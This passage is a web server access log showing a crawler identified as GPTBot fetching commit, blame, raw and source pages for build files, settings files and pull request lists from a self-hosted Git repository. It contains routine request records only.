"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9972] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9997] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10781] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10784] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9996] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10783] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10779] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 9998] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10756] [Gzip 3.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11616] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10781] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 11615] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:18:31:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" +[17/Feb/2026:18:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/update_status.py?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/update_status.py" +[17/Feb/2026:18:31:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json?display=rendered" [Client 74.7.227.38] [Length 10929] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" +[17/Feb/2026:18:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json?display=source" [Client 74.7.227.38] [Length 11071] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" +[17/Feb/2026:18:31:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json?display=source" [Client 74.7.227.38] [Length 11102] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/.vscode/settings.json" +[17/Feb/2026:18:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/.vscode/settings.json" +[17/Feb/2026:18:31:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10781] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" [Client 74.7.227.38] [Length 10780] [Gzip 3.79] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/directory-.-Debug-f5ebdc15457944623624.json" +[17/Feb/2026:18:31:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10003] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=farduedate&state=closed&type=all" +[17/Feb/2026:18:31:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10844] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:18:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:18:31:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe?display=rendered" [Client 74.7.227.38] [Length 10874] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresWatchdog/PostgresWatchdog.exe" +[17/Feb/2026:18:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml?display=source" [Client 74.7.227.38] [Length 12170] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/docker-compose.yml" +[17/Feb/2026:18:31:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10013] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:18:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10017] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&state=closed&type=all" +[17/Feb/2026:18:31:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&state=open&type=all" +[17/Feb/2026:18:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?project=-1&state=open&type=all" +[17/Feb/2026:18:31:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?milestone=-1&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10181] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?project=-1&state=open&type=all" +[17/Feb/2026:18:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/8d291f57b63b0b2be49f636657ef35169d418129?files=C%2b%2bProject%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 17514] [Gzip 3.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:18:31:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/83e7d939e386dd9b236553115441a2075fc8fe7f?files=C%2b%2bProject%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 15278] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:18:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt?display=rendered" [Client 74.7.227.38] [Length 11149] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.txt" +[17/Feb/2026:18:31:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make?display=source" [Client 74.7.227.38] [Length 11670] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/flags.make" +[17/Feb/2026:18:31:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11749] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/cmake_clean.cmake" +[17/Feb/2026:18:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make?display=source" [Client 74.7.227.38] [Length 16073] [Gzip 5.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/build.make" +[17/Feb/2026:18:31:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/link.d?display=source" [Client 